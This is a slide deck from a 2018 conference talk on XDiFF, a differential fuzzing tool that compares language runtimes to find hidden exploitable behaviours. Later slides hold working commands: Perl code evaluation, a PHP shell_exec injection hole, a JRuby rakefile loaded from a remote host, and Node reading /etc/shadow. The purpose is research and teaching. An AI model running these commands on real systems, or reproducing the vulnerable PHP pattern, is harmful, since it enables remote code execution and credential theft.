Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Differential Fuzzing - Codemotion Milan 2018

Exposing Hidden Exploitable
Behaviors Using Extended
Differential Fuzzing
Fernando Arnaboldi
Milan - November, 2018

Agenda
• 1. What, Who, How & Why
• 2. Common Fuzzing
• 3. Differential Fuzzing
• 4. Extended Differential Fuzzing

1.1. What Do You Expect From Fuzzing?
• Fuzzing exposes undisclosed
functionalities or unexpected
behaviors.
• Extended differential fuzzing
can expose more stuff

1.2. Who Cares About Fuzzing?
• Security Consultants
• Software Testers
• Software Developers

1.3. How
• Manually or
• Using an extended differential fuzzing framework (XDiFF)
– Open source Python project
– Multiplatform (FreeBSD, Linux, OSX,
Windows)
– Gathers all the information
– Exposes the unexpected behaviors

1.3. How: Fuzzing Process
Input
Generation
Software
Execution
Output
Analysis

1.3. How: Generate the testcases
Create a new databaseDefine the base values to be
replaced (aka “functions”)
Define the values to
insert in the function
Permute the values

1.3. How: Define the Software
Pick a name
Define the OS
Define the Input: CLI, File, URL, Stdin
Define the Software

1.4. Why this approach? To automatize the
output analysis

0.1 + 0.2 - 0.3 = 0? Nah

9007199254740992 + 1 = 9007199254740992

2. Common Fuzzing

2. What to Detect:
• Crashes
• Hangs

2. Common Fuzzing: Crashes

2. Crashes: XDiFF Output – Valgrind

2. Crashes: XDiFF Output – Return Codes

Ruby
HHVM
2. Crashes
Pypy
Perl
ChakraCore

2. Crashes: XDiFF Output – Hangs

3. Differential Fuzzing

3. What is Differential Fuzzing?
• “Execute one or more similar implementations to compare and analize
their outputs”
• What do we mean by output?
– The standard output
– The standard error
– The network connections
– The return code
– The time required for the execution
– If the software was killed or not

3. What to Execute
• 3.1. Different implementations
• 3.2. Different inputs:
– CLI
– File
– URL
– Standard Input
• 3.3. Different versions
• 3.4. Different operating systems

3.1. Different Implementations

3.1. Different Implementations: Stdout
V8 (CLI) SpiderMonkey (CLI) NodeJS v7.2.1 (CLI)
$ d8 -e 'print(this)’
[object.global]
$ js -e 'print(this)’
[object.global]
$ node -e 'console.log(this)'
{
[...SNIP...]
USER: 'testuser',
PATH: '/opt/local/bin:…',
PWD: '/Users/testuser,
HOME: '/Users/testuser',
pid: 60094,
[...SNIP...]

3.1. Different Implementations: Killed or Stderr
OpenJDK 8 Oracle 9
Killed No Yes
Stderr
Exception in thread “main” java.lang.OutOfMemoryError: Java heap space
at sun.security.provider.NativePRNG$RandomIO.implGenerateSeed(NativePRNG.java:440)
[…]

3.2. Different Inputs

3.2. Different Inputs: Stdout
NodeJS v7.2.1 (File) NodeJS v7.2.1 (CLI)
$ echo "console.log(this)" > file.js ; node file.js
{}
{
[...SNIP...]
USER: 'testuser',
pid: 60094,
[...SNIP...]

3.2. Different Inputs: Stdout
Windows 10 Powershell (File) Windows 10 Powershell (CLI)
C:>echo Invoke-Expression dir > test.ps1
C:>powershell "& ""c:test.ps1""”
& : File C:test.ps1 cannot be loaded because
running scripts is disabled on this system.
For more information, see
about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3
+ & "c:test.ps1”
+ ~~~~~~~~~~~~~
+ CategoryInfo : SecurityError:
(:) [], PSSecurityException
+ FullyQualifiedErrorId :
UnauthorizedAccess
C:>powershell -Command Invoke-Expression dir
Directory: C:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/13/2017 5:41 PM PerfLogs
d-r--- 3/2/2018 8:45 AM Program Files
d-r--- 3/1/2018 12:16 PM Program Files(x86)
d-r--- 3/1/2018 12:20 PM Users
d----- 3/6/2018 3:15 AM Windows
-a---- 3/28/2018 10:34 AM 24 test.ps1

3.3. Different Versions

3.3. Different Versions: Stdout
NodeJS v0.4.0 (CLI) NodeJS v7.2.1 (CLI)
$ node -e ‘console.log(this)’
{}
{
[...SNIP...]
USER: 'testuser',
pid: 60094,
[...SNIP...]

3.3. Different Versions: Return Code or Stderr
OpenJDK 8 Oracle 9
Return
Code
0 1
Stderr
Warning: SecureRandom is internal
proprietary API and may be removed in a
future release
Package sun.security.provider is not
visible

3.4. Different Operating Systems

3.4. Different OS: Stdout
• In Python 2.7 the built-in functionality cmp() compares two objects:
• The following compares two floating point "not a number” values:
print(cmp(float('nan'),float('nan')))

3.4. Different OS: Stdout (cont).
Software OS Stdout
CPython
Linux -1
Freebsd 1
OS X 1
Windows 1
PyPy
Linux 0
Freebsd 0
OS X 0
Windows 0
Jython
Linux 1
Freebsd 1
OS X 1
Windows 1

3.4. Different OS: Stdout
Windows 10 Powershell (File) Linux Powershell (File)
C:>echo Invoke-Expression dir > test.ps1
C:>powershell "& ""c:test.ps1""”
& : File C:test.ps1 cannot be loaded because
running scripts is disabled on this system. For more
information, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3
+ & "c:test.ps1”
+ ~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [],
PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
# echo Invoke-Expression dir > test.ps1
# pwsh test.ps1
Directory: /
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/18 6:07 AM bin
d----- 3/3/18 3:23 PM boot
d----- 3/16/18 5:45 PM dev
d----- 4/5/18 9:13 AM etc
d----- 3/12/18 4:33 PM home
[…]

4. Extended Differential Fuzzing

4. What to Detect:
• Path Disclosure
• User Disclosure
• Error Disclosure
• Code Evaluated
• Command Executed
• Network Connections
• File Read

4.1. How Files are Deleted in Linux/OSX
server:tmp $ rm non-existing-file
rm: non-existing-file: No such file or directory
server:tmp $ touch existing-file
server:tmp $ rm -i existing-file
remove existing-file?

4.1. Path Disclosure: XDiFF Output

4.1. Path Disclosure: Powershell
C:Users>powershell -Command Clear-Content -Confirm non-existing-file
Clear-Content : Cannot find path 'C:Usersnon-existing-file' because it
does not exist.
At line:1 char:1
+ Clear-Content -Confirm non-existing-file
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:Usersnon-existing-
file:String) [Clear-Content], ItemNotFoundExcepti
on
+ FullyQualifiedErrorId :
PathNotFound,Microsoft.PowerShell.Commands.ClearContentCommand

4.1. Path Disclosure: Powershell (cont’d)
C:Users>echo blah > existing-file
C:Users>powershell -Command Clear-Content -Confirm existing-file
Confirm
Are you sure you want to perform this action?
Performing the operation "Clear Content" on target "Item:
C:Usersexisting-file".
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help
(default is "Y"):

4.2. User Disclosure: XDiFF Output

4.2. User Disclosure
C:>powershell -Command Start-Transcript
Transcript started, output file is
C:UsersAdministratorDocumentsPowerShell_transcript.DESKTOP-
QIJDN98.xoUGhDVe.20180328104416.txt

4.3. Error Disclosure: XDiFF Output

4.4. Code Evaluated: XDiFF Output

4.4. Code Evaluated: Perl
# perl -e "use ExtUtils::Typemaps::Cmd;print embeddable_typemap("system 'id'")"
String found where operator expected at (eval 1) line 1, near "require
ExtUtils::Typemaps::system 'id'"
(Do you need to predeclare require?)
uid=0(root) gid=0(root) groups=0(root)
Unable to find typemap for 'system 'id'': Tried to load both as file or module
and failed.

4.5. Command Execution: XDiFF Output

4.5. Command Execution: PHP 1/4

• Let’s define the a bash constant on index.php:
• The previous file requires functions.php and shows a man page:
<?php
define("bash","man ");
require_once("functions.php");
?>
<?php
$output = shell_exec(bash.$_GET['page']);
print "<pre>".$output."</pre>";
?>

• The command “man ” is executed when index.php is called:

• The command “bash” is executed when functions.php is called:

4.6. Network Connection: XDiFF Output

4.6. Network Connection: JRuby RCE
# curl http://10.0.0.1/canaryfile
puts %x(id)
Ruby v2.3.1 JRuby v1.7.27
# ruby -e 'require "rake";puts
Rake.load_rakefile("http://10.0.0.1/canar
yfile")'
/usr/lib/ruby/vendor_ruby/rake/rake_mod
ule.rb:28:in `load': cannot load such file --
[...SNIP...]
# jruby -e 'require "rake";puts
Rake.load_rakefile("http://10.0.0.1/canar
yfile")'
uid=0(root) gid=0(root) groups=0(root)

4.7. File Read: XDiFF Output

4.7. File Read: Leak Root’s Password
NodeJS with Chakracore NodeJS v4.2.6 with V8
# node -e "console.log(require('/etc/shadow))"
SyntaxError: Invalid character
[...SNIP...]
# node -e "console.log(require('/etc/shadow'))"
/etc/shadow:1
(function (exports, require, module, __filename,
__dirname) {
root:$6$AP53wsfZ$XdxiQRFJF6PzdRd3SxD
eIwKsmyEkWgNOSSg.WZR18KfLo617cR1Z
swMZEPT5QTS95aH.NI2DrqmQ8rMbm8sIq/:
17172:0:14600:14:::
^
SyntaxError: Unexpected token :

Extended Differential Fuzzing Conclusions
• Analyze different vulnerabilities
• Expose more vulnerabilities by differential analysis
• One payload could be used affect multiple pieces of
software

Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Differential Fuzzing - Codemotion Milan 2018

More Related Content

What's hot (19)

Similar to Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Differential Fuzzing - Codemotion Milan 2018 (20)

More from Codemotion (20)

Recently uploaded (20)

Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Differential Fuzzing - Codemotion Milan 2018